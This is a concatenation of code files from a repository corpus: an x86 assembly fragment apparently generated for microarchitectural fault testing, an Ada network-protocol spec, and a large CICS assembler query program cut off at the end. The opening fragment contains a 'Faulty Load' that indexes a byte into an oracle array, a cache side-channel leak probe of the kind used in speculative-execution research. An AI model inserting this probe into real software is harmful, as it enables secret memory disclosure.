(%r10) nop nop nop add %r8, %r8 // Faulty Load lea addresses_A+0x1ec94, %r10 inc %r12 movb (%r10), %cl lea oracles, %r10 and $0xff, %rcx shlq $12, %rcx mov (%r10,%rcx,1), %rcx pop %rsi pop %rdi pop %rcx pop %rax pop %r8 pop %r12 pop %r10 ret /* <gen_faulty_load> [REF] {'OP': 'LOAD', 'src': {'type': 'addresses_A', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}} {'OP': 'STOR', 'dst': {'type': 'addresses_A', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}} {'OP': 'STOR', 'dst': {'type': 'addresses_D', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 10, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_PSE', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 8, 'same': False}} [Faulty Load] {'OP': 'LOAD', 'src': {'type': 'addresses_A', 'size': 1, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}} <gen_prepare_buffer> {'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 7, 'same': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_normal_ht', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 5, 'same': True}} {'OP': 'LOAD', 'src': {'type': 'addresses_A_ht', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 5, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_D_ht', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 4, 'same': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_D_ht', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 10, 'same': False}} {'OP': 'LOAD', 'src': {'type': 'addresses_A_ht', 'size': 1, 'AVXalign': True, 'NT': False, 'congruent': 3, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WT_ht', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 5, 'same': False}} {'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'size': 32, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}} {'52': 143} 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 52 */

src/net-protos.ads

stcarrez/ada-enet

16

13891

<reponame>stcarrez/ada-enet<gh_stars>10-100 ----------------------------------------------------------------------- -- net-protos -- Network protocols -- Copyright (C) 2016, 2017 <NAME> -- Written by <NAME> (<EMAIL>) -- -- Licensed under the Apache License, Version 2.0 (the "License"); -- you may not use this file except in compliance with the License. -- You may obtain a copy of the License at -- -- http://www.apache.org/licenses/LICENSE-2.0 -- -- Unless required by applicable law or agreed to in writing, software -- distributed under the License is distributed on an "AS IS" BASIS, -- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -- See the License for the specific language governing permissions and -- limitations under the License. ----------------------------------------------------------------------- with Net.Buffers; with Net.Interfaces; package Net.Protos is pragma Preelaborate; ETHERTYPE_ARP : constant Uint16 := 16#0806#; ETHERTYPE_IP : constant Uint16 := 16#0800#; ETHERTYPE_IPv6 : constant Uint16 := 16#86DD#; type Receive_Handler is access not null procedure (Ifnet : in out Net.Interfaces.Ifnet_Type'Class; Packet : in out Net.Buffers.Buffer_Type); end Net.Protos;

Source/ZFAM020.asm

walmartlabs/zFAM

21

17692

<reponame>walmartlabs/zFAM * * PROGRAM: ZFAM020 * AUTHOR: <NAME> and <NAME> * COMMENTS: zFAM - z/OS File Access Manager * * This program is executed as the Query Mode GET/SELECT * service called by the ZFAM001 control program. * * This program will process primary column index requests * only. * *********************************************************************** * Start Dynamic Storage Area * *********************************************************************** DFHEISTG DSECT REGSAVE DS 16F Register Save Area BAS_REG DS F BAS return register RJ_REG DS F BAS return register - RJ_00** RX_REG DS F BAS return register - RX_00** RD_REG DS F BAS return register - RD_00** APPLID DS CL08 CICS Applid SYSID DS CL04 CICS SYSID USERID DS CL08 CICS USERID RA_ADDR DS F Response Array address (base) RA_PTR DS F Response array address (build) RA_LEN DS F Response Array length WS_LEN DS F WEB SEND Array length PA_ADDR DS F Parser Array address PA_LEN DS F Parser Array length FK_ADDR DS F zFAM Key record address FK_LEN DS F zFAM Key record length FF_ADDR DS F zFAM File record address FF_LEN DS F zFAM File record length CI_ADDR DS F zFAM CI record address CI_LEN DS F zFAM CI record length FD_ADDR DS F Container field address FD_LEN DS F Container field length DS 0F W_INDEX DS F Parser array index W_ADDR DS F Beginning data area address W_F_LEN DS CL08 Packed decimal field length W_T_LEN DS CL08 Packed decimal total length W_COUNT DS CL08 Packed decimal field count W_COLUMN DS CL08 Packed decimal field column W_PDWA DS CL08 Packed decimal field column DS 0F C_NAME DS CL16 Field Name (container name) C_LENGTH DS F Field Length (container data) DS 0F W_PRI_ID DS CL01 Primary column ID flag * *********************************************************************** * zFAM090 communication area * * Logging for ZFAM020 exceptional conditions * *********************************************************************** C_LOG DS 0F C_STATUS DS CL03 HTTP Status code C_REASON DS CL02 Reason Code C_USERID DS CL08 UserID C_PROG DS CL08 Service program name C_FILE DS CL08 File name C_FIELD DS CL16 Field name E_LOG EQU *-C_LOG Commarea Data length L_LOG DS H Commarea length * *********************************************************************** * File resources. * *********************************************************************** WK_FCT DS 0F zFAM Key structure FCT name WK_TRAN DS CL04 zFAM transaction ID WK_DD DS CL04 zFAM KEY DD name * WK_LEN DS H zFAM Key structure length * WF_FCT DS 0F zFAM File structure FCT name WF_TRAN DS CL04 zFAM transaction ID WF_DD DS CL04 zFAM FILE DD name * WF_LEN DS H zFAM File structure length * *********************************************************************** * Primary Index information * *********************************************************************** DS 0F PI_TYPE DS CL01 Actual key type DS 0F PI_COL DS CL04 Actual key column DS 0F PI_LEN DS CL04 Actual key lenth DS 0F PI_NAME DS CL16 Primary key field name *********************************************************************** * FAxxKEY record key. * *********************************************************************** DS 0F WK_KEY DS CL255 zFAM Key record key * *********************************************************************** * FAxxFILE record key. * *********************************************************************** WF_KEY DS 0F zFAM File record key WF_IDN DS CL06 ID Number WF_NC DS CL02 Named Counter WF_SEG DS H Segment number WF_SUFX DS H Suffix number WF_NULL DS F Zeroes (not used) * *********************************************************************** * Spanned Segment number * *********************************************************************** DS 0F SS_SEG DS H Spanned segment number * *********************************************************************** * SELECT options. * * Primary Key attributes must be included for SELECT requests using * * secondary column index. This is necessary as the Primary Key must * * be returned on all SELECT requests. * *********************************************************************** O_TABLE DS 0F O_P_COL DS PL04 Primary Key column number O_P_LEN DS PL04 Primary Key field length O_P_TYPE DS CL01 Primary Key field type DS CL03 Alignment O_P_NAME DS CL16 Primary Key field name * O_FORM DS CL09 Format message * FIXED - delimited by field size * XML - tags using field name * JSON - tags using field name * DELIMITER - field delimiter * Default - FIXED * DS CL03 Alignment * O_DIST DS CL03 Distinct messages returned * YES - Duplicates not returned * NO - Duplicates returned * Default - NO * DS CL01 Alignment * O_MODE DS CL08 Type of SELECT process * ONLINE - Synchronous request * OFFLINE - Asynchronous request * Default - ONLINE * O_SORT DS CL16 Sort order by field name * FieldName - Ascending sort by field * Default - Primary key * O_ROWS DS CL06 Maximum rows returned * 0 - All available rows * 1-999999 - Maximum rows returned * Default - 0 (All available) * DS CL02 Alignment O_WITH DS CL02 Type of Read (WITH) * UR - Uncommitted Read * CR - Committed Read * Default - UR * DS CL02 Alignment E_TABLE EQU *-O_TABLE Length of Option table * *********************************************************************** * Spanned segment status information * *********************************************************************** DS 0F W_LENGTH DS CL08 Field length (spanned/remaining) W_WIDTH DS F Field width W_FF_A DS F FAxxFILE data address W_LO DS F Column range low W_HI DS F Column range high W_REL_D DS F Relative displacement W_REL_L DS F Relative length W_SEG DS H Current segment number * *********************************************************************** * Trace entry * *********************************************************************** DS 0F W_46_M DS CL08 Trace entry paragraph * *********************************************************************** * Chunked Message Transfer - JSON and XML initial message length. * *********************************************************************** DS 0F M_LENGTH DS F HTTP initial message length *********************************************************************** * RECEIVE Media Type * * The following values override the OPTIONS(FORMAT=) parameter * *********************************************************************** DS 0F R_TYPE DS CL01 HTTP Media type - bit indicator R_PLAIN EQU X'80' text/plain (fixed) R_JSON EQU X'40' text/json R_XML EQU X'20' text/xml R_DELIM EQU X'10' text/delimited DS 0F R_LENGTH DS F HTTP WEB RECEIVE length R_MEDIA DS CL56 HTTP Media type - text from client * *********************************************************************** * End Dynamic Storage Area * *********************************************************************** * *********************************************************************** * Start Parser Array (maximum 256 fields) * *********************************************************************** * PA_DSECT DSECT P_ID DS PL02 Field ID P_SEC DS PL02 Field level security P_COL DS PL04 Field column P_LEN DS PL04 Field length P_TYPE DS CL01 Field type P_WHERE DS CL01 WHERE indicator P_SEG DS H Field record segment P_NAME DS CL16 Field Name E_PA EQU *-P_ID PA entry length *********************************************************************** * End Parser Array * *********************************************************************** * *********************************************************************** * Start Response Array buffer * *********************************************************************** RA_DSECT DSECT R_PRI DS CL255 Primary Key R_FIELD DS CL01 Field entry E_RA EQU *-R_PRI RA entry length * * *********************************************************************** * End Response Array buffer * *********************************************************************** * *********************************************************************** * Start Field Data buffer * *********************************************************************** FD_DSECT DSECT * * *********************************************************************** * End Field Data buffer * *********************************************************************** * *********************************************************************** * zFAM KEY store record buffer * *********************************************************************** COPY ZFAMDKA *********************************************************************** * zFAM FILE store record buffer * *********************************************************************** COPY ZFAMDFA * * * *********************************************************************** *********************************************************************** * Control Section - ZFAM020 * *********************************************************************** *********************************************************************** ZFAM020 DFHEIENT CODEREG=(R2,R3),DATAREG=R11,EIBREG=R12 ZFAM020 AMODE 31 ZFAM020 RMODE 31 B SYSDATE BRANCH AROUND LITERALS DC CL08'ZFAM020 ' DC CL48' -- Query Mode SELECT service ' DC CL08' ' DC CL08'&SYSDATE' DC CL08' ' DC CL08'&SYSTIME' SYSDATE DS 0H *********************************************************************** * Issue GET CONTAINER for Parser Array. * *********************************************************************** SY_0000 DS 0H MVC C_NAME,C_ARRAY Move parser array container MVC C_LENGTH,S_PA_LEN Move parser array length BAS R14,GC_0010 Issue GET CONTAINER ST R9,PA_ADDR Save parser array address MVC PA_LEN,C_LENGTH Move parser array length *********************************************************************** * Issue WEB RECEIVE to obtain Media Type * *********************************************************************** SY_0001 DS 0H EXEC CICS WEB RECEIVE X MEDIATYPE(R_MEDIA) X LENGTH (R_LENGTH) X SET (R1) X NOHANDLE * XC R_TYPE,R_TYPE Clear RECEIVE Media Type OC R_MEDIA,HEX_40 Set upper case CLC R_MEDIA(10),M_PLAIN text/plain requested? BC B'0111',*+8 ... no, continue MVI R_TYPE,R_PLAIN ... yes, set text/plain bit CLC R_MEDIA(09),M_JSON text/json requested? BC B'0111',*+8 ... no, continue MVI R_TYPE,R_JSON ... yes, set text/json bit CLC R_MEDIA(08),M_XML text/xml requested? BC B'0111',*+8 ... no, continue MVI R_TYPE,R_XML ... yes, set text/xml bit CLC R_MEDIA(14),M_DELIM text/delim requested? BC B'0111',*+8 ... no, continue MVI R_TYPE,R_DELIM ... yes, set text/delim bit * CLC R_MEDIA(16),A_JSON application/json requested? BC B'0111',*+8 ... no, continue MVI R_TYPE,R_JSON ... yes, set text/json bit CLC R_MEDIA(15),A_XML application/xml requested? BC B'0111',*+8 ... no, continue MVI R_TYPE,R_XML ... yes, set text/xml bit * *********************************************************************** * Issue GET CONTAINER for OPTIONS table. * *********************************************************************** SY_0010 DS 0H MVC C_NAME,C_OPTION Move OPTIONS table container MVC C_LENGTH,S_OT_LEN Move OPTIONS table length BAS R14,GC_0020 Issue GET CONTAINER * *********************************************************************** * Set RECEIVE Media Type using OPTIONS(FORMAT=xxxx) Parameter * * The OPTIONS and FORMAT parameter is the original means to request * * zQL response array format. Now, both Media Type or OPTIONS/FORMAT * * can be specified with Media Type taking priority. * *********************************************************************** SY_0011 DS 0H OC R_TYPE,R_TYPE Is RECEIVE Media Type zeroes? BC B'0111',SY_0019 ... no, RECEIVE has priority * MVI R_TYPE,R_PLAIN Set FORMAT(FIXED) default CLC O_FORM,S_FIXED FORMAT(FIXED) requested? BC B'0111',*+8 ... no, continue MVI R_TYPE,R_PLAIN ... yes, set text/plain bit CLC O_FORM,S_JSON FORMAT(JSON ) requested? BC B'0111',*+8 ... no, continue MVI R_TYPE,R_JSON ... yes, set text/json bit CLC O_FORM,S_XML FORMAT(XML ) requested? BC B'0111',*+8 ... no, continue MVI R_TYPE,R_XML ... yes, set text/xml bit CLC O_FORM,S_DELIM FORMAT(DELIM) requested? BC B'0111',*+8 ... no, continue MVI R_TYPE,R_DELIM ... yes, set text/delim bit * *********************************************************************** * Address Parser Array. * *********************************************************************** SY_0019 DS 0H L R4,PA_LEN Load parser array length L R5,PA_ADDR Load parser array address USING PA_DSECT,R5 ... tell assembler LA R6,E_PA Load parser array entry length *********************************************************************** * Scan parser array and mark the segment * *********************************************************************** SY_0020 DS 0H XR R8,R8 Clear sign bits in register ZAP W_COLUMN,P_COL Move PA column to work area CVB R9,W_COLUMN Convert to binary D R8,=F'32000' Divide column by segment size LA R9,1(,R9) Relative to one. STH R9,P_SEG Mark segment number *********************************************************************** * Continue scan of parser array until EOPA * *********************************************************************** SY_0022 DS 0H LA R5,0(R6,R5) Point to next PA entry SR R4,R6 Subtract PA entry length BC B'0011',SY_0020 Continue PA scan *********************************************************************** * Segment array initialization complete. * * Prepare to scan parser array. * *********************************************************************** SY_0028 DS 0H L R4,PA_LEN Load parser array length L R5,PA_ADDR Load parser array address USING PA_DSECT,R5 ... tell assembler LA R6,E_PA Load parser array entry length OI W_F_LEN+7,X'0C' Set packed decimal sign bit OI W_COUNT+7,X'0C' Set packed decimal sign bit *********************************************************************** * Scan parser array tallying field lengths * *********************************************************************** SY_0030 DS 0H CLC P_ID,PD_ONE Primary key? BC B'1000',SY_0035 ... yes, skip tally AP W_F_LEN,P_LEN Add field length to total AP W_COUNT,PD_ONE Increment field count SY_0035 DS 0H CLC P_ID,PD_ONE Primary ID field? BC B'0111',SY_0050 ... no, continue parsing MVI W_PRI_ID,C'Y' ... yes, set primary ID flag *********************************************************************** * Issue GET CONTAINER for Primary Column Index * *********************************************************************** SY_0040 DS 0H MVC PI_NAME,P_NAME Move field name MVC PI_TYPE,P_TYPE Move field type MVC PI_LEN,P_LEN Move field length MVC PI_COL,P_COL Move field column * MVC C_NAME,P_NAME Move container name MVC C_LENGTH,P_LEN Move field length AP W_F_LEN,P_LEN Add field length to total BAS R14,GC_0010 Issue GET CONTAINER * ST R9,FD_ADDR Save field data address MVC FD_LEN,C_LENGTH Move field data length *********************************************************************** * Adjust field entry length then continue tallying field lengths * *********************************************************************** SY_0050 DS 0H LA R5,0(R6,R5) Point to next PA entry SR R4,R6 Subtract field entry length BC B'0011',SY_0030 Continue scan until EOT *********************************************************************** * Check results of scan and branch accordingly * *********************************************************************** SY_0060 DS 0H CLI W_PRI_ID,C'Y' Primary ID flag set? BC B'0111',ER_40001 ... no, SYNTAX error *********************************************************************** * Calculate GETMAIN length for Response Array * *********************************************************************** SY_0070 DS 0H CVB R1,W_F_LEN Convert field length to binary XC W_PDWA,W_PDWA Clear packed decimal work area MVC W_PDWA+4(4),PI_LEN Move primary key length CVB R13,W_PDWA Convert key length to binary AR R1,R13 Add key length to response * CLI R_TYPE,R_PLAIN Delimit by fixed length? BC B'1000',SY_0078 ... yes, set GETMAIN length * XR R14,R14 Clear even register CVB R15,W_COUNT Convert field county to binary * CLI R_TYPE,R_XML Delimit by XML tags? BC B'1000',SY_0072 ... yes, set length CLI R_TYPE,R_JSON Delimit by JSON tags? BC B'1000',SY_0074 ... yes, set length CLI R_TYPE,R_DELIM Delimit by pipe character? BC B'1000',SY_0076 ... yes, set length BC B'1111',SY_0078 ... no, default FIXED *********************************************************************** * Include XML tags in total length * *********************************************************************** SY_0072 DS 0H M R14,=F'37' Multiply count by XML length AR R1,R15 Add XML tags to field length BC B'1111',SY_0078 Set GETMAIN length *********************************************************************** * Include JSON tags in total length * *********************************************************************** SY_0074 DS 0H M R14,=F'24' Multiply count by JSON length AR R1,R15 Add JSON tags to field length A R1,=F'32' Add JSON tags to key field BC B'1111',SY_0078 Set GETMAIN length *********************************************************************** * Include PIPE tags in total length * *********************************************************************** SY_0076 DS 0H M R14,=F'1' Multiply count by PIPE length AR R1,R15 Add PIPE tags to field length BC B'1111',SY_0078 Set GETMAIN length *********************************************************************** * Issue GETMAIN for Response Array using total field length. * *********************************************************************** SY_0078 DS 0H ST R1,C_LENGTH Save in work area BAS R14,GM_0010 Issue GETMAIN ST R9,RA_ADDR Save Response Array address MVC RA_LEN,C_LENGTH Save Response Array length *********************************************************************** * Determine Primary Index field type and branch when numeric. * * Set key as character. * *********************************************************************** SY_0080 DS 0H OI PI_TYPE,X'40' Set upper case bit CLI PI_TYPE,C'N' Numeric? BC B'1000',SY_0090 ... yes, set key accordingly ZAP W_LENGTH,PI_LEN Move PA length to work area CVB R6,W_LENGTH Convert to binary MVI WK_KEY,X'40' Set first byte of key to space LR R1,R6 Load PI field length S R1,=F'1' Subtract one for space S R1,=F'1' Subtract one for EX MVC LA R14,WK_KEY Load target field address LA R14,1(,R14) Point past space LA R15,WK_KEY Load source field address EX R1,MVC_0080 Execute MVC instruction * L R1,FD_LEN Load field data length S R1,=F'1' Subtract one for EX MVC LA R14,WK_KEY Load FAxxKEY key address L R15,FD_ADDR Load field data address EX R1,MVC_0081 Execute MVC instruction * BC B'1111',SY_0100 Read FAxxKEY MVC_0080 MVC 0(0,R14),0(R15) Initial with spaces MVC_0081 MVC 0(0,R14),0(R15) Move PI to key *********************************************************************** * Set key as numeric. * *********************************************************************** SY_0090 DS 0H ZAP W_LENGTH,PI_LEN Move PA length to work area CVB R6,W_LENGTH Convert to binary MVI WK_KEY,X'F0' Set first byte of key to zero LR R1,R6 Load PI field length S R1,=F'1' Subtract one for zero S R1,=F'1' Subtract one for EX MVC LA R14,WK_KEY Load target field address LA R14,1(,R14) Point past zero LA R15,WK_KEY Load source field address EX R1,MVC_0090 Execute MVC instruction * L R1,FD_LEN Load field data length SR R6,R1 Subtract PI from maximum * S R1,=F'1' Subtract one for EX MVC LA R14,WK_KEY Load FAxxKEY key address LA R14,0(R6,R14) Adjust for field length L R15,FD_ADDR Load field data address EX R1,MVC_0091 Execute MVC instruction * BC B'1111',SY_0100 Read FAxxKEY MVC_0090 MVC 0(0,R14),0(R15) Initial with zeroes MVC_0091 MVC 0(0,R14),0(R15) Move PI to key *********************************************************************** * Issue READ for FAxxKEY using Primary Column Index. * *********************************************************************** SY_0100 DS 0H LA R1,E_DK Load KEY record length STH R1,WK_LEN Save KEY record length BAS R14,FK_0010 Issue READ for KEY structure OC EIBRESP,EIBRESP Normal response? BC B'0111',ER_20401 ... no, STATUS(204) ST R10,FK_ADDR Save KEY buffer address MVC FK_LEN,WK_LEN Save KEY buffer length USING DK_DSECT,R10 ... tell assembler *********************************************************************** * Issue READ for FAxxFILE using Primary Column Index. * *********************************************************************** SY_0110 DS 0H DROP R10 ... tell assembler L R5,PA_ADDR Load Parser Array address MVC WF_LEN,S_DF_LEN Move FILE record length MVC WF_SEG,P_SEG Set segment number BAS R14,FF_0010 Issue READ for FILE structure OC EIBRESP,EIBRESP Normal response? BC B'0111',ER_20402 ... no, STATUS(204) ST R10,FF_ADDR Save FILE buffer address USING DF_DSECT,R10 ... tell assembler MVC FF_LEN,WF_LEN Save FILE buffer length LA R1,DF_DATA Load data portion ST R1,W_FF_A Save data portion *********************************************************************** * Initialize Response Array and Primary column index. * *********************************************************************** SY_0120 DS 0H DROP R5 ... tell assembler L R8,PA_LEN Load parser array length L R9,PA_ADDR Load parser array address USING PA_DSECT,R9 ... tell assembler * L R5,RA_LEN Load response array length L R4,RA_ADDR Load response array address USING RA_DSECT,R4 ... tell assembler ST R4,RA_PTR Save RA pointer * STM 0,15,REGSAVE Save registers LA R14,HEX_00 Load source address LA R15,0 Load source length ICM R15,B'1000',HEX_00 Move pad byte MVCL R4,R14 Move nulls to response array LM 0,15,REGSAVE Load registers * CLI R_TYPE,R_JSON Result set JSON? BC B'0111',*+8 ... no, continue BAS R14,RJ_0010 ... yes, create JSON tag * L R4,RA_PTR Load RA pointer ZAP W_LENGTH,PI_LEN Move field data length CVB R1,W_LENGTH Load into register S R1,=F'1' Subtract one for EX MVC LR R14,R4 Load RA primary key address L R15,W_FF_A Load field data address ZAP W_COLUMN,PI_COL Move field column CVB R6,W_COLUMN Load into register S R6,=F'1' Make relative to zero LA R15,0(R6,R15) Adjust address with column EX R1,MVC_0120 Execute MVC instruction BC B'1111',SY_0130 Skip EX MVC MVC_0120 MVC 0(0,R14),0(R15) Move primaary key to RA *********************************************************************** * Adjust Response Array address and length * *********************************************************************** SY_0130 DS 0H ZAP W_LENGTH,PI_LEN Move field data length CVB R1,W_LENGTH Load into register SR R5,R1 Adjust Response Array length LA R4,0(R1,R4) Point to first field ST R4,RA_PTR Save as Response Array base * CLI R_TYPE,R_JSON Result set JSON? BC B'0111',*+8 ... no, continue BAS R14,RJ_0020 ... yes, create JSON tag * *********************************************************************** * Prepare to scan parser array for field definitions * *********************************************************************** SY_0140 DS 0H L R8,PA_LEN Load parser array length L R9,PA_ADDR Load parser array address *********************************************************************** * Scan Parser Array for field definitions. * *********************************************************************** SY_0150 DS 0H CLC P_ID,PD_ONE Primary index? BC B'1000',SY_0165 ... yes, get next entry CLC P_ID,PD_NINES Entry already processed? BC B'1000',SY_0160 ... yes, get next entry BC B'1111',SY_0170 ... no, check HI/LO range *********************************************************************** * Adjust Parser Array address and length * *********************************************************************** SY_0160 DS 0H SY_0165 DS 0H LA R1,E_PA Load parser array entry length LA R9,0(R1,R9) Point to next PA entry SR R8,R1 Subtract PA entry length BC B'0011',SY_0150 Continue when more entries BC B'1111',SY_0250 Scan PA for unprocessed entries *********************************************************************** * Check column number for HI/LO range for current segment * *********************************************************************** SY_0170 DS 0H ZAP W_COLUMN,P_COL Move PA column to work area CVB R1,W_COLUMN Load in R1 C R1,W_HI Is column beyond segment range? BC B'0011',SY_0160 ... yes, get next PA entry C R1,W_LO Is column before segment range? BC B'0100',SY_0160 ... yes, get next PA entry * MVC P_ID,PD_NINES Mark field as processed * *********************************************************************** * Calculate relative offset from current segment. * * * * To calculate relative offset from current segment: * * 1). Subtract 1 from current segment number, giving the * * relative segment number. * * 2). Multiple relative segment number by 32,000 giving the * * segment displacement. * * 3). Subtract segment displacement from column number giving * * relative displacement. * * * * For example, column 50 would be calculated as such: * * 1). Subtract 1 from current segment. Segment 1 will contain * * columns 1 thru 32,000. So for column 50, the relative segment * * number for step 1 would be zero. * * 2). Multiply relative segment zero by 32,000 giving segment * * displacement, which in this case is zero. * * 3). Subtract segment displacement from the column, which in this * * case is 50, giving the relative displacement of 50. * * * * Another example, column 64,075 would be calculated as such: * * 1). Subtract 1 from current segment. Segment 3 will contain * * columns 64,001 thru 96,000, so for column 64,075 the relative * * segment for step 1 would be two. * * 2). Multiply relative segment two by 32,000, giving segment * * displacement, which in this case would be 64,000. * * 3). Subtract segment displacement from the column, which in this * * case would be 64,000 from 64,075 resulting in a relative * * displacement of 75 * * * *********************************************************************** SY_0180 DS 0H XR R6,R6 Clear R6 * LH R7,DF_SEG Load segment number LH R7,W_SEG Load current segment number S R7,=F'1' Get relative segment number M R6,S_32K Multiply by max segment size * ... giving segment displacement ZAP W_COLUMN,P_COL Load column number CVB R1,W_COLUMN Convert from PD to binary SR R1,R7 Subtract segment displacement * ... giving relative displacement S R1,=F'1' ... then make relative to zero ST R1,W_REL_D Save relative displacement * ZAP W_LENGTH,P_LEN Set source length L R4,RA_PTR Load RA pointer * CLI R_TYPE,R_JSON Result set JSON? BC B'0111',*+8 ... no, continue BAS R14,RJ_0030 ... yes, create JSON tag * *********************************************************************** * Calculate width to determine if field spans a segment. * *********************************************************************** SY_0185 DS 0H L R1,W_REL_D Load relative displacement CVB R6,W_LENGTH Convert length to binary AR R6,R1 Add relative displacement ST R6,W_WIDTH Save field width C R6,S_32K Wider than 32K? BC B'0011',SY_0200 ... yes, spanned segment *********************************************************************** * Move field to Response Array. * *********************************************************************** SY_0190 DS 0H STM 0,15,REGSAVE Save registers CVB R7,W_LENGTH Set source length L R1,W_REL_D Load relative displacement L R6,W_FF_A Set source address LA R6,0(R1,R6) Add relative displacement LR R5,R7 Set target length * L R4,RA_PTR Set target address * MVCL R4,R6 Move field to Response Array LM 0,15,REGSAVE Load registers * CVB R1,W_LENGTH Load field length L R4,RA_PTR Load current RA pointer LA R4,0(R1,R4) Load the new RA pointer ST R4,RA_PTR Save the new RA pointer * CLI R_TYPE,R_JSON Result set JSON? BC B'0111',*+8 ... no, continue BAS R14,RJ_0040 ... yes, create JSON tag * BC B'1111',SY_0140 Continue Parser Array process *********************************************************************** * Field spans segments. * *********************************************************************** SY_0200 DS 0H STM 0,15,REGSAVE Save registers L R1,W_REL_D Load relative displacement L R6,W_WIDTH Load field width SR R6,R1 Subtract relative displacement ST R6,W_WIDTH Save field width *********************************************************************** * Move spanned segment field to Response Array * *********************************************************************** SY_0210 DS 0H L R6,W_REL_D Load relative displacement L R1,S_32K Load 32K length SR R1,R6 Subtract relative displacement ST R1,W_REL_L Set relative length L R6,W_FF_A Set source address L R15,W_REL_D Load relative displacement LA R6,0(R15,R6) Adjust relative displacement LR R5,R1 Set source length LR R7,R1 Set target length * L R4,RA_PTR Set target address * MVCL R4,R6 Move field to Response Array * L R1,W_REL_L Load relative length L R4,RA_PTR Load current RA pointer LA R4,0(R1,R4) Load the new RA pointer ST R4,RA_PTR Save the new RA pointer * CVB R1,W_LENGTH Convert current field length S R1,W_REL_L Subtract relative length CVD R1,W_LENGTH Save remaining length * XC W_REL_D,W_REL_D Zero relative displacement L R1,W_WIDTH Load width L R15,W_REL_L Load relative length SR R1,R15 Subtract relative length ST R1,W_WIDTH Save width * LH R1,WF_SEG Load segment number LA R1,1(0,R1) Increment by one STH R1,WF_SEG Save segment number * MVC WF_LEN,S_DF_LEN Move FILE record length BAS R14,FF_0010 Issue READ for FILE structure OC EIBRESP,EIBRESP Normal response? BC B'0111',ER_20403 ... no, STATUS(204) ST R10,FF_ADDR Save FILE buffer address USING DF_DSECT,R10 ... tell assembler LA R1,DF_DATA Load data portion ST R1,W_FF_A Save data portion MVC FF_LEN,WF_LEN Save FILE buffer length MVC SS_SEG,WF_SEG Save spanned segment number * CLC W_WIDTH,S_32K Width more than 32K? BC B'0011',SY_0210 ... yes, move spanned segments * *********************************************************************** * Move remainder of spanned segment field to Response Array. * *********************************************************************** SY_0220 DS 0H L R1,W_REL_D Load relative displacement BC B'1111',SY_0185 Move remainder to RA *********************************************************************** * Scan parser array if there are any fields that are yet to be * * processed. When fields in the parser array are not on the current * * record segment, the entry is skipped requiring the parser array to * * be scanned until all entries are tagged as processed by the '999' * * P_ID. * *********************************************************************** SY_0250 DS 0H L R8,PA_LEN Load parser array length L R9,PA_ADDR Load parser array address LA R1,E_PA Load parser array entry length *********************************************************************** * Search for unprocessed parser array entry * *********************************************************************** SY_0260 DS 0H CLC P_ID,PD_ONE Primary index? BC B'1000',SY_0270 ... yes, continue CLC P_ID,PD_NINES Processed entry? BC B'1000',SY_0270 ... yes, continue L R8,PA_LEN Load parser array length L R9,PA_ADDR Load parser array address * MVC WF_LEN,S_DF_LEN Move FILE record length MVC WF_SEG,P_SEG Set segment number BAS R14,FF_0010 Issue READ for FILE structure OC EIBRESP,EIBRESP Normal response? BC B'0111',ER_20405 ... no, STATUS(204) ST R10,FF_ADDR Save FILE buffer address USING DF_DSECT,R10 ... tell assembler MVC FF_LEN,WF_LEN Save FILE buffer length LA R1,DF_DATA Load data portion ST R1,W_FF_A Save data portion * BC B'1111',SY_0140 Process parser array *********************************************************************** * Check parser array entries until EOPA * *********************************************************************** SY_0270 DS 0H LA R9,0(R1,R9) point to next PA entry SR R8,R1 Subtract PA entry length BC B'0011',SY_0260 Continue when more PA entries BC B'1111',SY_0300 Send response array when EOPA * *********************************************************************** * Send response * *********************************************************************** SY_0300 DS 0H L r4,RA_PTR Load RA pointer * CLI R_TYPE,R_JSON Result set JSON? BC B'0111',*+8 ... no, continue BAS R14,RJ_0050 ... yes, create JSON tag * BAS R14,WS_0010 Issue WEB SEND BC B'1111',RETURN Return to CICS *********************************************************************** * Secondar Column Index section * *********************************************************************** SY_0400 DS 0H * *********************************************************************** * Return to caller * ********************************************************************** RETURN DS 0H EXEC CICS RETURN * *********************************************************************** * Issue GET CONTAINER (SET Register) * * This is used for Parser Array and Primary Column Index * *********************************************************************** GC_0010 DS 0H ST R14,BAS_REG Save return register * EXEC CICS GET CONTAINER(C_NAME) X SET(R9) X FLENGTH(C_LENGTH) X CHANNEL(C_CHAN) X NOHANDLE * L R14,BAS_REG Load return register BCR B'1111',R14 Return to caller * *********************************************************************** * Issue GET CONTAINER for Options Table (INTO EISTG) * *********************************************************************** GC_0020 DS 0H ST R14,BAS_REG Save return register * EXEC CICS GET CONTAINER(C_NAME) X INTO(O_TABLE) X FLENGTH(C_LENGTH) X CHANNEL(C_CHAN) X NOHANDLE * L R14,BAS_REG Load return register BCR B'1111',R14 Return to caller * * *********************************************************************** * Issue GETMAIN for Response Array * *********************************************************************** GM_0010 DS 0H ST R14,BAS_REG Save return register * EXEC CICS GETMAIN X 